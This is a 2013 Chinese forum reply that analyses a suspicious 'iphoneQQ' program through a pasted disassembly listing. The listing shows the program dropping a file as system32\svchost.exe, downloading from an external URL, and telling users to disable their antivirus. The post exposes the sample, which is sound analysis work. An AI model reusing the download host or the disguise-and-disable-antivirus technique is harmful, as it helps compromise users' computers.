口条 发表于 2013-2-24 16:37
这两个帖子让我迷糊,首先楼主举报的帖子资源是谁做的?
小A沙箱运行样本,提示修改系统文件,但之后就没 ...
他的确是创建了svchost,后台下载在C:\WINDOWS\system,不知道是不是- 00401B4A 55 push ebp
- 00401B4B 8BEC mov ebp,esp
- 00401B4D 81EC 04000000 sub esp,0x4
- 00401B53 68 04000080 push 0x80000004
- 00401B58 6A 00 push 0x0
- 00401B5A 68 E4365400 push iphoneQQ.005436E4 ; C:\WINDOWS\system32\svchost.exe
- 00401B5F 68 01000000 push 0x1
- 00401B64 BB C0BC4000 mov ebx,iphoneQQ.0040BCC0
- 00401B69 E8 1C930000 call iphoneQQ.0040AE8A
- 00401B6E 83C4 10 add esp,0x10
- 00401B71 85C0 test eax,eax
- 00401B73 0F84 35000000 je iphoneQQ.00401BAE
- 00401B79 6A 00 push 0x0
- 00401B7B 6A 00 push 0x0
- 00401B7D 6A 00 push 0x0
- 00401B7F 68 02000080 push 0x80000002
- 00401B84 6A 00 push 0x0
- 00401B86 68 00000000 push 0x0
- 00401B8B 68 04000080 push 0x80000004
- 00401B90 6A 00 push 0x0
- 00401B92 68 E4365400 push iphoneQQ.005436E4 ; C:\WINDOWS\system32\svchost.exe
- 00401B97 68 03000000 push 0x3
- 00401B9C BB D0B14000 mov ebx,iphoneQQ.0040B1D0
- 00401BA1 E8 E4920000 call iphoneQQ.0040AE8A
- 00401BA6 83C4 28 add esp,0x28
- 00401BA9 E9 D8000000 jmp iphoneQQ.00401C86
- 00401BAE 68 04000080 push 0x80000004
- 00401BB3 6A 00 push 0x0
- 00401BB5 68 2F355400 push iphoneQQ.0054352F ; http://dxdown5.87pan.com:888/dl.php?AjAHaQxhCWBVD1VrUj8BOQw8VmlVIFIxD3sPIAVjBicOdANhDHVfNlR3V2FWMwc+VWVXCgdoBmQCOVwxBD9WMgJiBzEMKwljVSNVOFJsAWUMa1ZtVWpSZg8vDyYFdgZoDmgDNAw8X2BUflc3VmsHfVUwV2EHLgY0AmBcZgQyVjUCZwcwDG4JNlVmVTZSaQFnDD9WbFU1UmIPPA9lBWIGMA5tA2U
- 00401BBA 68 01000000 push 0x1
- 00401BBF B8 02000000 mov eax,0x2
- 00401BC4 BB B00B4500 mov ebx,iphoneQQ.00450BB0
- 00401BC9 E8 C8920000 call iphoneQQ.0040AE96
- 00401BCE 83C4 10 add esp,0x10
- 00401BD1 8945 FC mov dword ptr ss:[ebp-0x4],eax
- 00401BD4 68 05000080 push 0x80000005
- 00401BD9 6A 00 push 0x0
- 00401BDB 8B45 FC mov eax,dword ptr ss:[ebp-0x4]
- 00401BDE 85C0 test eax,eax
- 00401BE0 75 05 jnz short iphoneQQ.00401BE7
- 00401BE2 B8 DC365400 mov eax,iphoneQQ.005436DC
- 00401BE7 50 push eax
- 00401BE8 68 04000080 push 0x80000004
- 00401BED 6A 00 push 0x0
- 00401BEF 68 E4365400 push iphoneQQ.005436E4 ; C:\WINDOWS\system32\svchost.exe
- 00401BF4 68 02000000 push 0x2
- 00401BF9 BB 00BD4000 mov ebx,iphoneQQ.0040BD00
- 00401BFE E8 87920000 call iphoneQQ.0040AE8A
- 00401C03 83C4 1C add esp,0x1C
- 00401C06 8B5D FC mov ebx,dword ptr ss:[ebp-0x4]
- 00401C09 85DB test ebx,ebx
- 00401C0B 74 09 je short iphoneQQ.00401C16
- 00401C0D 53 push ebx
- 00401C0E E8 71920000 call iphoneQQ.0040AE84
- 00401C13 83C4 04 add esp,0x4
- 00401C16 6A 00 push 0x0
- 00401C18 6A 00 push 0x0
- 00401C1A 6A 00 push 0x0
- 00401C1C 68 02000080 push 0x80000002
- 00401C21 6A 00 push 0x0
- 00401C23 68 00000000 push 0x0
- 00401C28 68 04000080 push 0x80000004
- 00401C2D 6A 00 push 0x0
- 00401C2F 68 E4365400 push iphoneQQ.005436E4 ; C:\WINDOWS\system32\svchost.exe
- 00401C34 68 03000000 push 0x3
- 00401C39 BB D0B14000 mov ebx,iphoneQQ.0040B1D0
- 00401C3E E8 47920000 call iphoneQQ.0040AE8A
- 00401C43 83C4 28 add esp,0x28
- 00401C46 68 04000080 push 0x80000004
- 00401C4B 6A 00 push 0x0
- 00401C4D 68 87375400 push iphoneQQ.00543787 ; 警告提示:
- 00401C52 68 01030080 push 0x80000301
- 00401C57 6A 00 push 0x0
- 00401C59 68 30000000 push 0x30
- 00401C5E 68 04000080 push 0x80000004
- 00401C63 6A 00 push 0x0
- 00401C65 68 92375400 push iphoneQQ.00543792 ; 您没有关闭杀毒软件!请关闭杀毒软件在重新使用!
- 00401C6A 68 03000000 push 0x3
- 00401C6F BB 00BE4000 mov ebx,iphoneQQ.0040BE00
- 00401C74 E8 11920000 call iphoneQQ.0040AE8A
复制代码 他貌似还强制收听了他的微博 |